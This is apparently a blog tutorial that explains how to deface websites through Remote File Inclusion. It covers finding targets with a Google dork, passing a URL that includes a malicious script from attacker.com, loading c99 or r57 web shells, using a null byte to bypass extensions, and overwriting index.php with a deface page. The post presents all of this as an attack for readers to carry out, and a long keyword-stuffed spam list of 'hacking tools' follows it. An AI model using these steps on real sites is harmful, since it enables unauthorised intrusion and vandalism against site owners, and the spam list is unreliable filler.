HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?
Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.
SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?
First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
- You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
- Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
- Hacking Tools 2020
- Pentest Recon Tools
- Hacker Tools For Ios
- Hacker Tools Hardware
- Best Hacking Tools 2020
- Hack Tools For Windows
- Pentest Recon Tools
- Hack Tools Online
- Hacking Tools Kit
- Hacking Tools For Mac
- Hack Tools Github
- Termux Hacking Tools 2019
- Hacker Tools Github
- Github Hacking Tools
- Hacking Tools Mac
- Pentest Tools
- World No 1 Hacker Software
- Hack Website Online Tool
- Pentest Tools Subdomain
- Hack Tools Download
- Beginner Hacker Tools
- Pentest Tools Review
- Hacking Tools Download
- Easy Hack Tools
- Pentest Tools For Mac
- Pentest Tools Windows
- Pentest Tools Framework
- Pentest Tools For Mac
- Wifi Hacker Tools For Windows
- Pentest Tools Free
- Hackers Toolbox
- Hacker Tools For Mac
- How To Install Pentest Tools In Ubuntu
- Physical Pentest Tools
- Pentest Tools Review
- Bluetooth Hacking Tools Kali
- Hacker Tools Free
- Hack Tools Pc
- Hack App
- Hack Tool Apk
- Hacking Tools Online
- Ethical Hacker Tools
- Hacker Tools Online
- Hack App
- Hack Tool Apk No Root
- Tools For Hacker
- Hacker
- Hack Tools For Mac
- Pentest Tools Website Vulnerability
- Hacking Tools For Windows 7
- Pentest Tools Website Vulnerability
- Best Hacking Tools 2019
- Hacking Tools Mac
- Hacker
- Hacking Tools And Software
- Pentest Box Tools Download
- Free Pentest Tools For Windows
- Hacking Tools 2019
- Game Hacking
- Pentest Tools For Ubuntu
- Hacking Tools Online
- Hacker Tools Apk
- What Is Hacking Tools
- Pentest Tools Linux
- Hacking Tools Software
- Usb Pentest Tools
- Hacker Tools Windows
- Hacking Tools
- New Hacker Tools
- Hacking Tools For Pc
- Hacker Tools 2019
- Hacker Tools Hardware
- Hacker Tools Free
- Hack Tools For Games
- Hacking Tools Online
- Black Hat Hacker Tools
- Hacker Tools List
- Hacking Tools For Windows
- Hacks And Tools
- Hacker
- Hack Tools For Windows
- Nsa Hack Tools
- Hack Tools
- How To Hack
- Pentest Tools Website Vulnerability
- Hacker Tools 2019
- Pentest Reporting Tools
- Hacking Tools Mac
- Beginner Hacker Tools
- Hacker Tool Kit
- How To Make Hacking Tools
- Hacking Tools For Beginners
- Hacking Tools
- Hacks And Tools
- New Hacker Tools
- Hack Tools For Mac
- Hacker Hardware Tools
- Hack Tools
- What Are Hacking Tools
- Pentest Tools Windows
- Hackers Toolbox
- Hacking Tools For Windows Free Download
- Pentest Recon Tools
- Hacking Tools Download
- Pentest Tools Alternative
- Growth Hacker Tools
- Hacking Tools And Software
- Android Hack Tools Github
- Hacking Tools Name
- Hacker Tools For Mac
- Hacker Techniques Tools And Incident Handling
- Hack Tool Apk
- Hacking Tools Usb
- Hacker Tools For Ios
- Hack Tools 2019
- Black Hat Hacker Tools
- Hacking Tools Windows 10
- Pentest Tools For Mac
- Pentest Tools
- Computer Hacker
- Tools Used For Hacking
- Hacking Apps
- Hacking Apps
- Hacking Tools Download
- Hacking Tools Usb
- Hacking Tools 2019
- Easy Hack Tools
- Hack Tools
- Pentest Tools Nmap
- Nsa Hack Tools
- Pentest Tools Android
- Wifi Hacker Tools For Windows
- Hack Tools
- Pentest Recon Tools
- Pentest Reporting Tools
- Pentest Tools Linux
- Hacking Tools For Windows 7
- Hacker Tools Github
- Hack Tools
- Top Pentest Tools
- Hacker Tools Apk
- Hacking Tools For Windows 7
- Hacking Tools Windows
- Pentest Tools Linux
- Hack Tools For Games
- Hacker Tools For Windows
No comments:
Post a Comment